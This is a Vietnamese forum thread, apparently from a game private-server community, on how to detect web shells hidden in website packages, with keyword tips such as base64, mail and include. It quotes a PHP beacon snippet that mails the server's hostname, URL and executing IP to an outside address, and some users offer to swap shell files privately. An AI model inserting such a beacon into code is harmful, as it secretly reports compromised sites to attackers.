PDA

View Full Version : [MU] Cách nhận biết shell ?



cuocdoisp
20-03-13, 03:16 PM
cuocdoisp thấy dạo này phong trào mu đi lên nhờ cái vụ shell này . nhiều cao thủ vào tham gia , cuocdoisp xin các cao thủ có thể gợi ý một cách thật lòng ( ai không thực lòng xin không spam ) một số cụm từ hoặc lệnh để có thể dựa vào nó mà phát hiện file đó có shell . ví dụ cuocdoisp search trên mạng thì có cụm từ : base64 . nhưng một từ có vẻ là quá ít để nhận biết file đó có nguy hiểm hay không .
Topic lập ra với mong muốn chia sẻ và hy vọng được giúp đỡ từ các bạn biết vậy rất mong anh em post bài hãy nói cụ thể cụm từ , hay lệnh thôi những vấn đề khác dạng như : dùng hàng crack thì chẳng bị , dùng hàng thương mại đi , mua website đi hay hãy dùng host bên này đi có shell cũng không sợ .... xin vui lòng đừng post tại đây
Xin gửi lời cảm ơn chân thành nhất đến những người chia sẻ kiến thức tại đây !

TB: ai có file shell nào upload cho anh em nghiên cứu cấu trúc thì tốt quá

vithanhlam
20-03-13, 03:27 PM
cuocdoisp thấy dạo này phong trào mu đi lên nhờ cái vụ shell này . nhiều cao thủ vào tham gia , cuocdoisp xin các cao thủ có thể gợi ý một cách thật lòng ( ai không thực lòng xin không spam ) một số cụm từ hoặc lệnh để có thể dựa vào nó mà phát hiện file đó có shell . ví dụ cuocdoisp search trên mạng thì có cụm từ : base64 . nhưng một từ có vẻ là quá ít để nhận biết file đó có nguy hiểm hay không .
Topic lập ra với mong muốn chia sẻ và hy vọng được giúp đỡ từ các bạn biết vậy rất mong anh em post bài hãy nói cụ thể cụm từ , hay lệnh thôi những vấn đề khác dạng như : dùng hàng crack thì chẳng bị , dùng hàng thương mại đi , mua website đi hay hãy dùng host bên này đi có shell cũng không sợ .... xin vui lòng đừng post tại đây
Xin gửi lời cảm ơn chân thành nhất đến những người chia sẻ kiến thức tại đây !

TB: ai có file shell nào upload cho anh em nghiên cứu cấu trúc thì tốt quá

#-o Shell bây giờ ngụy trang tốt lắm, 1 2 dòng lệnh là có 1 con shell rồi tùy theo cách của mỗi người nhưng mà scan thì ít khi ra, còn tìm thủ đông thì rất lâu. tốt nhất là sài hàng mua hoặc tự code được thì tốt,

Det_Me_15K_VL
20-03-13, 03:31 PM
Shell giờ ko ai dùng như thế đâu bạn ah

Họ code thêm vào 1 số lệnh là có trong tay all info của của ban thôi ( Nhận biết cái này cực khó và phải biết chút ít về code đó thì mới tìm đc )

Tôi chỉ ví dụ đơn giản 1 đoạn :

IF ( Chỉ cần có 1 connect ) Thì ( Mọi thông tin gửi về mail của hacker ) << Đoạn code này nhìn thế thôi chứ bạn quyét = gì đi nữa nó cũng ko báo đâu >> cái này là hợp lệ mà .

Còn làm sao lấy đc thông tin thì ko khó bạn ah

Còn cách nữa nhưng nói ra các cao thủ Crack sẽ thêm vào code ngay và luôn ý chứ .

ninhmca
20-03-13, 04:56 PM
Shell giờ ko ai dùng như thế đâu bạn ah

Họ code thêm vào 1 số lệnh là có trong tay all info của của ban thôi ( Nhận biết cái này cực khó và phải biết chút ít về code đó thì mới tìm đc )

Tôi chỉ ví dụ đơn giản 1 đoạn :

IF ( Chỉ cần có 1 connect ) Thì ( Mọi thông tin gửi về mail của hacker ) << Đoạn code này nhìn thế thôi chứ bạn quyét = gì đi nữa nó cũng ko báo đâu >> cái này là hợp lệ mà .

Còn làm sao lấy đc thông tin thì ko khó bạn ah

Còn cách nữa nhưng nói ra các cao thủ Crack sẽ thêm vào code ngay và luôn ý chứ .

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);
code này là gì anh ơi.30ckarrrrrrrrrrrrrrrrrrrrrrrr

Edward_Newgate
20-03-13, 05:00 PM
code này là gì anh ơi.30ckarrrrrrrrrrrrrrrrrrrrrrrr

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Link: [Link shell] - IP Excuting: [IP vừa chạy lệnh] - Time: [Thời gian]

cuocdoisp
20-03-13, 05:03 PM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

hackluv
20-03-13, 05:08 PM
cuocdoisp thấy dạo này phong trào mu đi lên nhờ cái vụ shell này . nhiều cao thủ vào tham gia , cuocdoisp xin các cao thủ có thể gợi ý một cách thật lòng ( ai không thực lòng xin không spam ) một số cụm từ hoặc lệnh để có thể dựa vào nó mà phát hiện file đó có shell . ví dụ cuocdoisp search trên mạng thì có cụm từ : base64 . nhưng một từ có vẻ là quá ít để nhận biết file đó có nguy hiểm hay không .
Topic lập ra với mong muốn chia sẻ và hy vọng được giúp đỡ từ các bạn biết vậy rất mong anh em post bài hãy nói cụ thể cụm từ , hay lệnh thôi những vấn đề khác dạng như : dùng hàng crack thì chẳng bị , dùng hàng thương mại đi , mua website đi hay hãy dùng host bên này đi có shell cũng không sợ .... xin vui lòng đừng post tại đây
Xin gửi lời cảm ơn chân thành nhất đến những người chia sẻ kiến thức tại đây !

TB: ai có file shell nào upload cho anh em nghiên cứu cấu trúc thì tốt quá

em có nhiều shell nhưng anh bảo lãnh em cái :| sợ mấy người kia block lắm :D

Edward_Newgate
20-03-13, 05:11 PM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Tìm shell nên tìm theo các từ khóa như: base64, mail... Các cái cần xem kỹ là: include, require,...

Det_Me_15K_VL
20-03-13, 05:23 PM
Cho nên các bạn quét hay gì thì đừng mơ mà nó ra .

Cho nên cách đơn giản nhất Liên hệ Ku vinh lấy source chuẩn nhất

cuocdoisp
20-03-13, 06:55 PM
em có nhiều shell nhưng anh bảo lãnh em cái :| sợ mấy người kia block lắm :D
cho anh xin cái yahoo hoặc pm yahoo anh . send qua yahoo là không sợ em à:))

hackluv
20-03-13, 07:49 PM
cho anh xin cái yahoo hoặc pm yahoo anh . send qua yahoo là không sợ em à:))

em send link qua yahoo cho anh rùi anh nhé :)

ikyssu
21-03-13, 12:11 AM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])." - ".$_SERVER['<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>']."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Excuting: $ip_remote - Time: $time_shell";
$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";
@mail($to_email, $server_mail, $linkcr, $header);

Đoạn code này có trong bản nweb của mình
Edward cho mình hỏi nó đã lấy dc những thông tin của mình chưa?

DieuNinh
21-03-13, 12:13 AM
Đoạn code này có trong bản nweb của mình
Edward cho mình hỏi nó đã lấy dc những thông tin của mình chưa?



xin chúc mừng Anh Vinh đã trúng thưởng thêm 1 MU nữa

ikyssu
21-03-13, 12:32 AM
hehe. Bản này mới up lên host để test thôi. Nhưng mà nghe có vẻ buồn nhỉ :(

The Gamer
21-03-13, 12:37 AM
xin chúc mừng Anh Vinh đã trúng thưởng thêm 1 MU nữa

nhâm rồi cậu

hình như là web chứ ko phải wed

huythao229
21-03-13, 01:49 AM
sory delllllllllllllllllllllllllllllllllllllllllllll